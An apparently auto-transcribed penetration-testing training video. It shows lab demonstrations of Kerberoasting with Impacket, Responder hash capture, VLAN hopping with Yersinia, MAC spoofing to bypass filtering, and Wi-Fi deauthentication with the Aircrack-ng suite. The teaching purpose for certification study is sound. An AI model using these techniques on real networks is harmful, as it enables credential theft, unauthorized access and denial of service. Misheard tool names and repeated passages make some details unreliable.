Yeah, curb roasting is an instrument going against Windows systems, Windows operating systems. So Windows operating systems use curb roast for authentication. And what's the neat thing about that is if you ever find your way into a Windows system, you can employ curb roasting to try to gain access to further your access into their environment. This is pivoting, lateral movement, that kind of stuff. So curb roasting, what it allows us to do is to try to go against our service accounts, right? So let me show you what I mean. There's things called SPNs, service principal names, that we typically give to service accounts so they're easily used within the curb roast environment. So we don't have to remember their exact name. We can use the SPN. But you remember curb roast, there's tickets, ticket granting tickets, and TGS and all the fun stuff that goes along with working with the curb roast system. A lot of times you're saying, hey, if I need to use a service, I need that TGS for that service. We just don't ever see it. Well, what if I could? What if I could see that information? What do we do? Well, we can do that with the Impacket suite, very good suite of tools. And for our intents purposes, I'm going to use the Impacket dash, what is it? Is get user SPNs. Yeah, I just did a tab complete there to get this going. And then you do -DC -IP to get the IP address of the DC. I've got one up, 192.168.241.200. So got Microsoft and Microsoft going crazy, have a good time. And then next thing you do is just get the domain and the username of the user account that you already have. Remember, it's post-exploitation. I probably got a username and password already built in or that are correct. So what I do is mine is example.com, and then my user is thanks, which says thanks. Right? If I click that, it's going to ask for his password. I'll put that in if I can. You'll notice I was able to retrieve an SPN called MSSQL_service from this lovely domain controller. All right, cool. Now I want that hash for that password. If I do a request on the end of that, it will request that. And whoa, there it is. So now I can feed that into John the Ripper, Hashcat, and hopefully, because service accounts are typically created by people, and people aren't the greatest at creating good passwords, I find that in a dictionary file, or I can brute force it, but it's offline now. I have this, I can just take my time, put in my password, cracking rig, and let it do its thing. So that's one way of getting a hash for using curb roasting.
All right, we also have a category here a little bit, I think older maybe, NTLM relay attacks.
NTLM relay attacks. Guess what? Your system in Windows is still using NTLM. A lot of people are like, why are we still doing this? Should not do that. But it does leave us open to attack, and that's why. That's what I said about that. Curb roast, when it doesn't work, it will default back to NTLM. Other systems will also use NTLM. Right? One of the first ones that come to my mind is when you're doing like SMB. Right? A lot of times if you're looking up shares, it will use NTLM and ask you actually to authenticate, and you will send an NTLM v2 hash between the systems to let you know I'm authenticated. Fun, right? So interesting thing. Basically with NTLM, a relay attack, it's a man-in-the-middle type of attack. So I'm going to poison some people, make them think that I'm the right destination for their information, and I'm going to pass that along to the actual intended destination, gathering that info throughout the entirety of that conversation. I can do that. Which one of the most fun ways in which you can do this is using a tool called Responder. I'm going to do responder. There we go. I'm going to do -I for interface, which is ETH0 for me. I like to do -V for it to be very verbose, or just verbose. You can do more than one. I'm going to fire it off. Give it my password. And you can see that it's doing some stuff. What's it doing? Well, its main function is poisoning LLMNR and MBT-MS. Right, so this is LLMNR, which is local multicast name resolution. Look at me knowing an acronym. I know, right? That's a fun one. And then MBT is the NetBIOS name service. Right? Yeah. So what happens here? How does this work? Glad you asked. So much fun. When people try to use those systems, it's kind of like a quick and dirty DNS, right? But it's using NetBIOS. Right? So if anybody looks it up, I'm poisoning them saying, I've got your lookup right here. Come to me for that. Send me that information, and we'll gather that information. Let's jump over to my Windows workstation I have here. There we go. And if I look up a share, okay, I gotta do whack. What was it? Win. I think Win 10. Am I Win 10? Anyway, let's see if it's already doing it. You'll notice I've already started to poison answers. We can see that's happening. You can see there's a name for Win, this, that, and the other. But if we actually start looking for shares, I'm surprised the shares that show up there. Show me some shares. Oh, there we go. So let's say Win-B03K, blah, blah, blah. And now there's an example share. Great. Look over here. This is an NTLM v2 hash that I can now put into a file and ask Hashcat or John the Ripper to crack for me. And I will have another username and password. And that looks like it's for the administrator account, so that's fun. So when you're in engagement in a Windows environment, one of the first things you like to do is just crank up Responder and see what you can grab. This is an internal thing. Just let it do its work, and you'll grab a ton of passwords and usernames using that method.
All right, Daniel, well, that's quite a bit on password cracking, but that doesn't mean that you have to remember them all. You have the entire website you can lock in. Let's do a quick review here. So in the beginning, we did take a look at the different tools that we can use for hash cracking, as well as Daniel described the concept here of password spraying and curb roasting, which I think is funny to say. And of course, lastly, the idea of NTLM. These demonstrations are, of course, to actually help you to figure out how to do this and what context to put them in as well. But that's not all there is, of course, to PenTest Plus, and there is more to come with Daniel Lowry, so make sure you stay tuned for the very next episode.
Got 60% of it already in the bank. We're an independent organization.
That's right, it's not quite. That's right, we are jumping right back into PenTest Plus, and of course with Mr. Daniel Lowry, and we're going to be taking a look at, well, VLAN hopping, which is kind of a weird attack to describe.
It is
but overall though, it's actually, that's right, it's not quite the bunny hop. That's right, it's not quite the bunny. That's right, we are jumping right back into PenTest Plus, and of course with Mr. Daniel Lowry, and we're going to be taking a look at, well, VLAN hopping, which is kind of a weird attack to describe.
It is
but overall though, it's actually a very neat attack to actually work.
Well, you know, one of the major defenses nowadays, and has been for a while, honestly, is to segment your network out, right? Because then if I gain access to one part of the network, I don't necessarily have access to any other part, but I still have other areas that I would like to get to that I might not be able to. So we don't like it when we see one giant flat network out there, because if an attacker makes their way inside of your network, guess what? They have access to everything, therefore segmentation is a real deal. Does that mean I can't actually access those things? Maybe, maybe not. How can we get around that type of defense? VLAN hopping comes to save the day sometimes, not always, right? So be prepared for these things and not work right out of the gate in real lifetime, but for intents purposes for the PenTest Plus exam, it's definitely something I want you to know about and can actually serve you in the real world if you're on engagement. You never know, which is fine.
All right, so Daniel Daniel, when we start talking about the idea of a VLAN hopping attack, you want to just make that description, or do you want to kind of just jump in and try to describe what we set up?
Yeah, you know, I'd say let's start with describing the setup, because Ronnie here is really, he's really the unsung hero of this episode. He actually set up an entire network for us. That's not huge, but it's enough that we could actually perform this as a demonstration. So Ronnie, if you could explain the network scenario here.
All right, so the scenario that I've actually set up for Daniel is simple. I've got him isolated to a single VLAN, which we call VLAN 11, and that is representing like a guest network. As Daniel may have come into your building and just sat down, he might have gotten access to the wireless, or he might have gotten access, by plugging in a port, but he's now on a guest VLAN. Well, there is another VLAN that's out there that, of course, has accounting information. We've got two PCs there, and they're all, of course, connected to a switch which houses the VLANs. So in that particular setup, everything is set up default on the switch itself, so we're not adding anything else in there. But this actually gives Daniel the challenge of whether or not he can go from VLAN 11 and maybe see traffic on VLAN 22.
All right, that sounds like a challenge that I like. This is where VLAN hopping might come into play and actually help us out. So what do we mean by VLAN hopping? Obviously, Ronnie's got me on VLAN 11. I should only see that traffic. I shouldn't be able to see any traffic on VLAN 22. And you said that VLAN 11 is a guest network. VLAN 22 is going to be our accounting network. Ooh, that sounds like a tasty target right there. I love some accounting information. That would be great. How would I do that? So VLAN hopping should allow me to be able to jump from the VLAN that I'm in into a different VLAN. We can do this in a couple of different ways, which is what we're going to get into in more specifics. But the idea is that I will be able to traverse from one VLAN into another, manipulating through some types of manipulations actually.
Yeah. So let's talk about the two different methods that are possible. You're going to pick which one you can choose. Right?
Yeah. Well, I'll name them out. Right? So we have switch spoofing, right? And we have double tagging. So let's start with switch spoofing. Switch spoofing is pretty simple. Basically, what we do is we say, "Hey computer, tell the switch that you're a switch." And it goes, "Okay, I'll do that, no problem." And it emulates the traffic of a switch that is in trunking mode. And Ronnie, trunking mode, tell me when I have multiple switches and I need to get information from one switch, from one host on one switch to another host on another, and they're on their VLANs and things like that. They typically do that through a trunk, correct?
Right. And here's why the attack actually is fairly successful here is that it used to be by default. Let's take Cisco switches because that's pretty much when you plug two switches in, it wanted to become a trunk. So that way, even if you had VLANs that were set up, it automatically allowed all traffic from all VLANs to cross, that particular trunk. So now you added a machine which can spoof a trunk. Now it actually says, "Oh, we believe this is another switch, so let's go ahead and offer all the VLAN traffic to even go there to Daniel's machine."
I like it. It sounds fun, doesn't it? Okay, let's get into the computer. Let's start doing some stuff. Let's show how we could actually make this happen now. This isn't my normal Kali machine. This is actual. I'm VNC'd into the actual network that Ronnie has built. So there's a Kali machine there. So that's gonna be our attack machine for today. And what I'm gonna do is I'm gonna go with some Wireshark. Let's fire that up. I'm gonna do it from the terminal because I'm gonna sudo that thing. Sometimes I don't get the prompt I'm looking for. So sudo Wireshark. Bam. Fire off. Do the thing. There you go. I'm 11 every minute. Hey, a real Wireshark is actually happening here. All right, so now we pick our interface. Ronnie, I'm dual home here. Which one should I go with?
Let's try F0.
F0. Let's do it. All right. So eventually some traffic will probably start scrolling in. I can already see that I'm seeing some spanning tree, CDPs. This is all the switch talking to the network, trying to figure stuff out. That's normal conversational traffic by network devices. And since I'm receiving it, I can sniff it out with Wireshark. So good stuff. Now that that's done, let's go and open up another terminal, and I'm going to wait for the terminal to fire off. And I'm going to type in Ecernia-G. And I might actually need to sudo that. There we go. Fire that off. And it's letting me open the alpha version, no problem. So this tool, Ecernia, is going to give us the capabilities of actually pretending to be a trunk switch. So what I need to do is go to launch attack, click launch attack, and then you'll see some choose protocol attack area. Looking for that DTP. That's what you want. From there, I hit enable trunking, and I don't check another service attack. That's not what I'm trying to do. That's a different thing, different episode. And I'll hit OK. And from there, eventually, let's jump back into Wireshark here. And we can see that traffic kind of happening here. Configuring the route and all this other good stuff. And I'm actually telling that switch that I am a trunk port. Now, Ronnie, can you generate some traffic? Maybe we can say something. I'm not sure 100% whether we're going to be able to glean any good traffic from this, but we'll give it a shot. Ultimately, at the end of the day, what you need to know is Ecernia is what's helping us do that whole switch spoofing attack, which is what we're performing. That's the meat and potatoes of this. It's just a cherry on top of the cake if we get any real traffic based off of it. So get something going. Not seeing anything. Well, of course, also just STP, spanning tree again, spanning tree. Still just the Ecernia traffic. I just see that, switch port 1. No, nothing on the IP level. Nothing there. But that's cool. Like I said, not really important for what we need to know. It's just, it would have been, oh, there we go. Let's just see some ARP traffic is happening. Still on the 11 network though, right? Okay, let's double down. That's not getting us where we want to go. Maybe we throw on the idea of our next type of VLAN hopping attack, which is the double tagging, right? Double tagging is really cool because what it does is it says, okay, I'm going to tag my packets for a specific network or a specific VLAN, and then I'm going to tag it again with another VLAN, right? So this is the inner and outer tags. So the inner tag is going to be the desired destination VLAN, the place I want to go. And then, of course, the outer tag is going to be like the native VLAN that I'm on. What happens is once that information is passed to the switch, it will strip off the outer tag by default because that's how the switch works. Going, and goes, oh, there's a tag here. This traffic is meant for that VLAN. So that inner tag is that destination VLAN. And once it strips the outer tag off, it sees it and says, oh, let me transfer that over, and then the host will receive that network information. So let's get this out of the way. Let's go actually back to Ecernia. Am I even saying that right? Ecernia. Yeah, I think that's right. Ecernia sounds pronounced. I'm not great at reading. So we're going to go back to attack, and this time I'm going to look for this .802.1q area. And from here you have this description of sending .802.1q double encapsulated packets. That's what we're looking for, and then hit OK. That goes to work. It's doing stuff. We see that happening. So there's the 802.1q packets actually doing something. Scroll down. Let's go back to capturing traffic and Wireshark and see if anything pops up on that 22. So I see that our traffic is labeled is IP ranged at what was that? 192.168.11.1. So let's be kind of very common practice for network administrators that if your VLAN is VLAN 11, then whatever your IP scheme kind of reflect that IP or the idea of. So we're seeing 192.168.11.1. So cool. I'm assuming then I should eventually see some traffic for. Oh, wait for it. There it is. Look at that. I'm seeing traffic now destined for 192.168.22.11. There's an ARP that went for that network that I was actually able to see because I'm not only my trunking, but I'm also doing that double tagging attack, which is allowing me to hop into that VLAN and see traffic destined for said VLAN that I should not be seeing. So pretty straightforward. I like Ecernia. I can never pronounce this right. I like the tool because how easy it was. It's like I've got those built-in attacks. You just got to know which one you're looking for, what you want to do with it. Fire and forgets. No real major configuration necessary. You just need to understand exactly which attack you're using, and it's an easy, simple tool to be able to perform this attack. And then from there, start doing some man in the middle, or maybe denial of service. I think denial of service is typically what you're looking for here, but from what I understand, you might be able to do some man in the middle attacks as well.
Yeah, all right, Daniel. When it comes down to VLAN attacks, those are pretty much the two most popular attacks that are out there. And if you think you're going to do this against a lot of newer equipment, you might not be able to because of some of the things that have changed over time, and of course, best practices that are on those machines as well. But overall, you did get to see a VLAN attack, and that means we are done for this episode. But plenty more to come in PenTest Plus. You want to see more? Make sure you stay. When it comes to different types of That's right. We are the two guys you don't want to trust on your computer network if you want to stay safe here. No, we are taking a look, of course, at PenTest Plus. I've got Mr. Daniel Lowry here with me, and we are focusing in on the realm of Mac spoofing. And if you're not sure what that means, make sure you go back and take a look at this episode a couple times, but also review some different networking notes that you may have before. But Daniel, as we get started here, this is one of the concepts where it sounds like it should be easy to do, but it's a little bit harder to just get set up so that we can see it happen, right?
Well, I had to set up a lot of infrastructure. Yeah. So first, so that you could see how this works. But at the end of the day, if I were just a pen tester or an attacker, maybe not. All that infrastructure would already be there. I would just need to attack it using the Mac spoofing technologies that we're going to look at today. Mac spoofing is a very useful tool. We'll talk about what that's about, and then we'll take a look at how we might employ Mac spoofing in some real-world scenario.
All right. So once again, maybe it's been a while since we've taken a little bit of our Network Plus knowledge. We might need to go ahead and get you to help us to define what Mac spoofing actually is before you show us how to do it.
All right, well, let's do that very thing, right? So when it comes to Mac spoofing, this is the, help me out, make sure I got my Mac straight. You know how I am with this. Media access control, right? Controller. This is the, there's a hardware address, right, that goes along with your network interface adapter, correct?
Yep.
I'm on point on that. I've taken networking, that's right. Ryan does networking, so definitely listen to him on this stuff. Now, one of the great things that we like about those hardware addresses is that they are, what, Ryan, are they mutable or immutable?
Well, they are immutable on those devices.
That's right.
Yeah.
That's right. But, and because of that, we use that to identify different devices. I've got a phone, I've got a laptop, I've got his laptop, and it's a really great way to discern one device from another because that's an immutable kind of idea behind it.
Burned in that factory.
Burned in, it's called a burned in address, right? Yeah, BIA.
BIA.
That's right. Having a good time with the BIA. Sounds like a government entity.
It does.
Bureau of Internal Affairs, I think. Maybe. I don't know. Something. Oh, it is. I think it might be an actual government entity. Anyway, for our purposes, it is the burned in address. So that's why we like to use it. We like to say, oh, okay. And not only that, but Ron, you set up many of different wireless networks. You set up different like switch networks. They all tend to lean on MAC addresses for some sort of identification purposes or even for filtering, right? You start to see the usefulness of the MAC address and the things we can do with it. Now, MAC spoofing is what we're going to talk about. What does that mean? Well, we now know what MAC is. At least we've been reminded of it. Spoofing is the idea that I can pretend I'm a MAC that I am not. Right, so I like how Ron kind of put that. Well, it's meant to be immutable, right? But depending on what you're doing and what kind of capabilities you have, know-how-wise or tool-wise, you actually very well may be able to change that. If I can change that, I can make other devices believe I'm a device that I'm not. This is MAC spoofing. This is why it is important for us.
All right, so where do we tend to use this as we are going to move forward?
Sure. You can use this in many different ways. I think I'm going back to ARP spoofing, where that's kind of the opposite way around. Where I'm kind of taking ARP and telling it this is the IP and this is the MAC that go together. I'm not changing my MAC. I'm telling it the IP associated with it is a different IP, right? So that things can get a little messed up. But with MAC spoofing, I can use that where MACs are being used specifically to identify. So I'm thinking of things like network access control solutions, right? Those lovely little monitors. If you've ever tried to set up one, well, enjoy your time in Bellevue Mental Hospital because they're a bit complex to get rolling. Once they're up and running, they're amazing at filtering out devices that you wish to not have a part of your network, right? Kind of build yourself an allowed list of good MAC addresses and devices that are associated with them, and there you go. Anytime you add a new one, you add to the list, they get access, others do not. We see this as well in wireless networks as well, right? You have a wireless device, you jump into the administrative portal, probably somewhere around the security area, you'll probably see something to the tune of MAC filtering. That's great. I can say allow or deny these MAC addresses. So I can create an allow list, I can create a deny list, I can create both, whatever, depending on the operating system of the router and its capabilities. Really cool router access point, is what I should say. So that's where we'll see this. This comes in handy as pen testers because we go into an office and I want to gain access to this thing, but they've got network access control. What I can do is I can find something like an IP phone or a printer or something that's typically not being used. I can grab that network cable, I can go through the settings and find what is the MAC address to this device, change my MAC on my laptop, plug that network cable in, it goes, hey, that's you. You're the right device. I'm calling Linux on the laptop, I'm not a network printer. I bypass NAC. Right? So it's one method for doing NAC bypass. Or even MAC address filtering. Again, you get that filter list. It says, hey, this is the list of approved devices somebody else can get in. I've discovered in various ways and forms the MAC addresses of a device that is connected, steal that, spoof that, and now I should be able to connect to the network.
All right, so can you show us how we can accomplish something like this?
Well, Ronnie, you're asking a lot.
I know. I always do.
This time, I guess I'll allow it. But try to jump again. We're gonna have words, right? You're backing up, right? Ronnie, oversteps, hold.
Just a little bit.
All right, yes, we can try to do this. So what I've done, like Ronnie kind of alluded to earlier, I have some infrastructure set up. Basically what I've done is I've created a wireless network with a wireless access point that's sitting underneath our desk. And I have a client connected to it, which is this little phone right here, right? And what I'm gonna do is first thing I need to do is I'm gonna discover what the MAC address is for this. We're gonna take a look at how we can do that using the aircraft NG suites. And then I'm going to spoof my MAC address. There's a couple ways we can do that. We'll see that when we get there. Let's start getting into this thing. First thing we need to do is discover what the MAC address is for the clients on that wireless access point. Now, if I look down here in my wireless connections, you'll notice I'm connected to ITProTV, which is, come to me, hello. This is like freaking out. I'll do this. I have the wireless thing right here. There we go. I'm connected to ITProTV. You can see that. With a little check mark. This is Belkin in wireless 89849F device is what I want to connect to. And if I try to connect to it, I click it. I'm disconnected, and you'll notice it's kind of like having trouble. It's an open wireless network. There's no web or WPA or anything on this, but I'm not connecting really. It seems to be freaking out. That's because there's MAC filtering available or employed on that. So you'll notice connection has failed. Oh no, right? So now it's trying another known good access point which is easily connected to. All right, I want access to that thing. What do I do? Okay, so now that's out of the way. We'll keep this just shrunk down here. First thing we need to do is, yes, thank you for adding printer. I really appreciate it. First thing we need to do is we're going to use arrow dump. I'm sorry, we're going to do airmon. So we need to monitor the network. We need to get some information first. So I'm going to do sudo airmon-ng, and I need to start. So I can start monitoring. I need to start on my wireless device. My wireless device is a weird name. It's WLP. Was it OS20F3? I believe. Yeah, I know. Fun, right? Hit that. Give the old password. Did I type my password right? No, I did not. It's like you get good passwords that you can never actually use the dang thing. And you'll notice that now that has changed to WPL blah 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 mon there at the bottom. So if I do config, I'll see that right there. Excellent. So now my wireless device is in monitoring mode. Now I can use some of the other tools like arrow dump ng. That's specifically what I want. So I'm gonna clear. I'll do sudo arrow dump. Yeah, arrow dump dash ng. I never remember if it's arrow dump or arrow dump. So I have to write that down. And then we're gonna do a let's see here. Let's just do. I think it's just start. Failed. Start. Oh, that's what it is. I had to give it the stinking WLP. Oh, let me find out. I'll never remember that one. Arrow dump ng. WLP was it OS20F3 mon. Right? Yeah, there we go. We're starting to learn about the wireless networks here. So I need to get the BSS ID of the wireless device that I'm looking for. So I'm kind of looking for something that has no, it's just open. So this one does say open right here, but that's not the one I'm looking for, I don't believe. Let's see here. Or is it? Actually, I think it is. It is open. It's on, okay, let's do that. I'm gonna allow. So I need to control C this, so it'll stop. It's gonna keep, it's dynamically moving. You know what I mean? It was a moving target. So now I can grab this and I'll copy that. I believe that. I also want to look at what channel it's on, which is channel 6, which is helpful. You need to know that. Anything else I need to know about this? I think we're good. So let's do this. Clear this up. I'm going to sudo arrow dump again, but this time I want to monitor for connectivity. I want to see anything that's connecting to that station. So I will do sudo arrow dump dash ng, there we go, dash C for channel on 6, and we'll do dash BSSID of control shift. There we go, and we have that in there. That should be good. That is my target. And then I'll do dash W for PSK and WLP. Oh, it's so much fun to remember. WLP, oh no, OS20. I know it's crazy, I should totally change that. F3 mon. Hit that, and now I'm waiting for a station to connect, which I do see here, which looks like that sucker right there. So that's what I want to change, because I know that's a good station. It's making a connection. Okay, control C. Stop. I want to copy you. I copy you. Okay, copy that. Now, there's a couple ways in which we can change the MAC address. One is MAC changer. Let's do dash help. And it gives you, it's actually a really nice tool, I gotta be honest with you, because it'll remember what your current MAC address is. You can set this up to run anytime you like, every time you restart your computer. It's a really helpful tool. Just so you got the dash M option, and you can set the MAC to whatever you like. Right? You can also actually use ifconfig. Now, to do this, I'm going to need to actually stop arrowmon. Yes, thank you. So many tools. So I'm going to do sudo arrowmon dash ng. There's no O in this one. Okay. Stop. I think just do negative the interface, which is, here we go again, WLP, OS20F3 mon. There we go. And now ifconfig, which is now back to normal. I've got that. Excellent. So now from here, I just need to do ifconfig, actually sudo ifconfig, and it will be my WLP S20F3 down. I'll take that down. So now I should be dropping my wireless connection very shortly. You should be doing it click on ifconfig, make sure that it's down. I don't see it, so that's good. That means it actually is down. And from here, I can change the hardware address as well using ifconfig. So sudo ifconfig. I'm going to change that HW. Oh, gotta give that's WLP. O F2O F3 HW ether. That's right. There we go. Tell what Ethernet address I'm going to use. Paste that in. That looks good. Hit it, and now we can sudo ifconfig up. Bam. Bring that back up. I should now be able to connect to that wireless network that we had trouble with before. Really quickly, just disable that wireless, and let's go here. And oh, not here. We're going to go here. Makes it easy. Network cable unplugged. That's fine. I don't really care. But why did that take that down? That's interesting. What did I do? Where's my wireless device? Did I bring it back up? I brought it back up. Let's take it back up. Can I connect? Connect. No, connect. We'll see what happens. Disconnected. Do an ifconfig. You're now connected. Aha! It's so much fun. There's a lot of moving parts, obviously. Things can kind of get jumbled around, so you gotta keep everything square. Apparently, operating systems can be fun to deal with as well. They have their own little quirks. But now, if I bring up a browser and I try to go to the administrative page, 2.1, I believe it is. Oh, look at that. I'm on that network where before I wasn't able to connect at all. There you go. MAC spoofing allowed me to bypass the MAC filtering, which we can see. Where's the MAC address filtering? It submits for that's. Oh, that's not where it is. MAC address control. There it is right there. That's the only allowed MAC address on this network. And since I'm currently spoofing that, it thinks I'm that and allowed me in. MAC spoofing. In a practical application.
All right, well, that was a great demonstration there on how we can actually accomplish the idea of MAC spoofing using the wireless network, and Dan also showed you bypassing the idea of some type of MAC, or at least the address filtering is actually going to be very helpful to do the penetration testing. Well, that will do it for this episode, but there's plenty more to come when it comes down to PenTest Plus, and that means there are more great episodes on the way. In PenTest. That's right, you made a great decision once again for your idea here of entering into the realm of pen testing. You're here, of course, with Daniel Lowry as we jump into the realm of different wireless attacks. Now, Daniel, these are actually different attacks that everybody goes, oh yeah, I want to jump into this, I want to be able to do this. And you start going live, you start going, this is a lot of work to just try and do this stuff, but it is one of the attacks that people do need to be aware of. So where are we going to begin?
Yeah, that's a great question. Where do we begin? Well, we're going to begin with talking about just an overarching generalized idea of what kind of wireless attacks we're looking at, and we'll get into more detail with the different areas in which we see wireless, because it's not just Wi-Fi, right? There are other wireless technologies, and you need to at least have some familiarity with some of the common terms and attacks, techniques, tools, things of that nature. So we'll try to get you up to speed for that so you're good to go on your exam. That's what we're about today. You're right when you say that it can be kind of a bear to set up because there's a lot of moving parts, like real infrastructure that you need. It's really difficult. I mean, it can be done, but you need bits and pieces like access points and the ability to set those access points in the way that you need to, just so that you can try certain things. So if you don't have an access point, if you want to try Wi-Fi attack, you don't want to get your hands on that kind of stuff. Most stuff has Bluetooth in it, so if you want to try that, you should probably be okay with that. Maybe not. You never know. You might need some adapters or modules and things of that nature. Just keep that in mind. Any software we need, though, I'll let you know how you get your hands on that.
All right, so when it comes to different attack types, what are we really talking about when it comes wirelessly? Is it really different than the wired network?
Yeah, in some ways not. Okay, so there will be some differences from a wired network when it comes to maybe some of the pieces of gear that you might provide and use for a set of attacks. But when it comes to just kind of the overarching how we attack things, because I like how you were mentioning that it was general, right? Generally, there are going to be just a handful of attack types that we're going to kind of mess around with, right? And ultimately, these are going to be things like jamming attacks. These are going to be things like spoofing attacks, corruption and manipulation of data, right? These are overarching buckets, right? These are big buckets that we might throw an attack type into, right? So just keep that in mind. And everything when it comes to jamming, you don't typically see a jamming attack on we call those denial of service attacks over a wire. You can consider a jamming attack as a denial of service attack because we are no longer able to utilize that wireless service. It has been denied, so that is a type of denial of service attack. But a jamming attack would be more specific to a wireless thing. If you haven't seen Spaceballs, I think of that every time we use the word they're jamming our signal. They throw the big jar of jam into the satellite dish. It's raspberry. That's what I think of. But it always equates me with that satellite dish. So I think of jamming with wireless a lot. So there you go.
Yeah, the other type of attack that I think was really kind of popularized in the movies are things like spoofing attacks that you tend to hear about. That somebody's taking over your signal and they're doing that. Of course, they're doing it in like 35 seconds.
Yeah,
but overall,
yeah, it's fun to watch movies, ladies and gentlemen. And sometimes that can be true, but not typically. Things can usually take a little bit more time. But exactly, those spoofing attacks are very prevalent. And then of course, those data corruption things like middle time. Not only am I able to like get into your conversation, but I can modify or deny service, all sorts of stuff. You can get into the middle of the conversation, and that is possible inside wireless attacks as well.
all right, so wireless is pretty much ubiquitous, right? It's
Yes.
just about everywhere that there is. So let's start off by taking a look at probably the most common, which is the Wi-Fi type of attacks.
All right, Wi-Fi attacks. Sure, that's why you are all here. That's why you get your punch to come to the show. So check out those Wi-Fi. Honestly, it does not throw me to do Wi-Fi attacks. It's not my favorite thing in the world. I can do it, but it's kind of like unless I was doing wireless pen testing all the time, and I probably would let that go to the wayside. It's not super fun. Now that said, there are some great tools for wireless attacking. I'm specifically Wi-Fi. I should say make that designation. I'm thinking of things like AirCrack NG, which is the mother of all wireless attack tools, honestly. And then as you move down the list of those things that kind of utilize AirCrack NG under the hood, as it were, using that as an engine, are things like Fern Wi-Fi Cracker or Wi-Fi. These are all great tools. Try to help you make the attacking process as painless as possible. But for today, we're going to take a look at AirCrack specifically because I would say you need to kind of understand AirCrack just a little bit so that you can be better prepared for those nicer tools that make things easy. So let's go into my class system here. You'll notice I kind of got my terminal split because we're going to need to kind of bounce from up and down and have to have some things captured on the top, other things on the bottom, and we're going to kind of go back and forth between these. But for right now, we just need to see what does AirCrack give us in terms of capability. Well, AirCrack, if you just kind of do tab value AirCrack NG, but if I do air and I tab, you'll notice I have more air tools. And that's because AirCrack NG is a suite of tools. It is also the name of a tool in the AirCrack NG suite. It's kind of recursive that way. Don't we like to have fun in the hacking world, right? So that can be a little confusing. Is the word I like to use. But be prepared to understand that AirCrack NG is a suite of tools, which includes the AirCrack NG tool. Okay. Now that said, one of the first things you gotta get comfortable with is going to be the Airmon NG, and that's super awesome. I'm gonna do some pseudo here and help you get your fingers on the right spot on the keyboard. And you'll do Airmon. Actually, I need to do ifconfig because I know what the name of my wireless adapter is, and there it is right there. Nice. Super easy. Every time this is easy. But I'm gonna do sudo Airmon -ng, and I'm just gonna start that and give it the adapter name. Fairly simple. I put in my password. It's a short password, as you can see. And if everything goes well, you can see I've been disconnected from my wireless network, and that's fine. I really don't need to get on the internet for what we're going to do. I need to be able to manipulate and work with my wireless device. And that's why I've done it. Now if I do an ifconfig, there we go. You'll notice that has changed, and it's add this mon on the end. Okay. Monitor. It's now in promiscuous mode, and we can start to like use it a whole lot more effectively when it comes to wireless stuff. And then from there, I can do all sorts of stuff. But this is step one with working with the AirCrack suite. Is I want to throw that. I need to be able to easily throw that adapter into that monitoring mode so that I can perform a variety of different types of attacks. That's really all I want to say right now about. Well, maybe I'll throw one more actually. I'll throw air dump. How about that? I'll give you air dump. Right out of the gate here. Let's jump back in. Sudo arrow dump. I guess it is dump -ng. Right. And this you can kind of give it to your wireless device. Right. So for us, it's going to be this craziness. I think I still have that pasted, so I'll just add on to the end. You'll notice it's starting to capture information. Right. I'm seeing all sorts of stuff. I see ESSID, so I see the ITProTV guest network. I have this Belkin and wireless. This is my little wireless device that I have underneath our desk here that we're going to use for testing purposes. It was like $10, so you don't need the latest and greatest wireless things to get your hands dirty, your feet wet with working with this stuff. But I'm starting to understand a little bit more about those systems, like what their BSSID is, basically the MAC address for the access points. That's good information. Other things like what channel they're working on, right? What cipher or encryption that they're using. That might be interesting information for me and will be helpful for us as we move into more cracking things and working with trying to do different types of attacks. So there you go. Airmon NG, also another great tool in the AirCrack NG suite.
All right, now the other one that you also listed something about de-authentication. What does that mean?
So de-authentication is a type of attack, okay? So if I just want to be a total jerk and de-auth people, right? Basically, it's an outsourced system with all in that jamming bucket. I want to jam people from being able to authenticate and use their wireless device, I can do a deauthentication attack, which will make people lose their connection. It will deauthenticate them. And what happens when you deauthenticate? The system goes, no, you're not authenticated, you can't have access. If I continually do that and I never let up, maybe I set up a laptop and a wireless device to make that happen where it never quits, then no one can access that device. And we'll talk more about why that might be important for us down the road. But for right now, you know how to be able to do it. And guess what? You can use AirCrack to do that very functionality. So how do we do that? How do we make that happen? Great question, glad you asked. We're going to use the Air Replay NG tool in the AirCrack suite here. And what we need to do is, actually, I just have a client here. It's just an old Samsung phone I had laying around. It is connected to the built-in wireless device that we see right here. Okay. Now, if I want to be able to just deauth things, well, the great news is I think it just needs to be SSID if I remember correctly. So I'm actually like Control C this will stop. It's continually like refreshing. And I need to be able to grab that. I need that. Copy that. Now, let's see here. What I need to do is I'll come down here and I'm going to do sudo air, it has air replay, it's always weird to me. There we go. Air replay, it's like one weird word. And then we will do a dash deauth, not death, deauth. And then I'll give it how many deauthentication packets I want to send. I'll send a simple, I'll send like 25 deauth packets, just to keep it simple. Otherwise I would give a lot and let it just kind of go to town. And let's see here, I'll do a dash H. And this is going to be, if I want to specifically deauthenticate a client like this one, I would actually need to know what its SS or its MAC address is. Which, now that I'm thinking about it, if we want to deauth this specific system, well, we're going to need that. So let me jump back into Airmon here. And I think to do that, how do I do? I have it written down. There's like I said, a lot going on here. If I want to get that, I need to, yes. I need to use the air.ng, but I need to get specific. I need to tell it, hey, I only want you to start capturing for this one specific access point. So let's make that happen. Let's go back up. We do want air.ng, but here, I'm going to grab some information from this screen right here. So I'm going to do a dash C for channel. We remember this built-in wireless was on channel 6. So I'm going to do channel 6, and then I'm going to do the dash B SSID, which is whatever that is, which I think I just copied. Yes, I did. So I'll just put that in there. There's the SSID of the AP that I wish to start monitoring. And do I need anything else? I don't think so. I think that's all I need. Fire away, and there it goes. It is now just looking at the traffic for that specific device. And you'll notice I have the SSID, and I also have station. Any station that shows up will be a connected device. If I want to deauth that specific device, well, then there you go. That's what I'm going to need. Sometimes it can be quick. I'm going to see if I can create some traffic or something, maybe. Well, come on, do something. It can take a hot second before it shows you these things. Just gonna, yes. Can I refresh this page or something? Come on, make it. Do it. Refresh the page. I do see requests and beacons and everything going on. Just wait for the station to show up, which eventually it will do. But I cannot control the timing on these things. Now can I? Wish I could. So I'll say we'll take a quick break. We'll wait for it. As soon as it shows up, we'll come back and we'll see what that is. All right, so there it goes. Finally got that station. There we go. We got that thing. And that is, well, of course, the MAC address for the device that is connected. So I want to deauth that thing. I want denial service to keep it from being able to connect. Well, there you go. So now we can come back down to the Air Replay NG to do our deauthentication. Yay, fun. And make that happen. So where were we? We have dash H. We need to put the client to deauth, which is that. Let me copy that. Put that in there. We'll paste through. And then we need to do a dash, put my fingers on the right spot, dash A. And of course we need the SSID yet again. Copy that. Come back here, paste 